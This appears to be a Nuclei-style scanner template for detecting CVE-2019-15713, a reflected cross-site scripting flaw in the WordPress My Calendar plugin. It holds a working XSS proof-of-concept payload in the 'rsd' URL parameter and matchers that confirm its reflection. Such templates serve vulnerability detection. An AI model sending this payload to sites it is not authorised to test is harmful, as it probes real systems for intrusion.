51 lines
1.7 KiB
YAML
51 lines
1.7 KiB
YAML
id: CVE-2019-15713
|
|
|
|
info:
|
|
name: WordPress My Calendar <= 3.1.9 - Cross-Site Scripting
|
|
author: daffainfo,dhiyaneshDk
|
|
severity: medium
|
|
description: WordPress plugin My Calendar <= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site.
|
|
remediation: |
|
|
Update to the latest version of the My Calendar plugin (>= 3.1.10) or apply the vendor-provided patch to fix the XSS vulnerability.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/9267
|
|
- https://wordpress.org/plugins/my-calendar/#developers
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-15713
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2019-15713
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00101
|
|
epss-percentile: 0.41308
|
|
cpe: cpe:2.3:a:my_calendar_project:my_calendar:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: my_calendar_project
|
|
product: my_calendar
|
|
framework: wordpress
|
|
tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022100bf7c940b52b2b2252d18d35117fb99b983cbd924b9aee0e95a32e45fcffda44102206b0a1970e1d1ed87c9b64dd4d87dd6ccc65fb61beebd8831879d043216bcb866:922c64590222798bb761d5b6d8e72950
|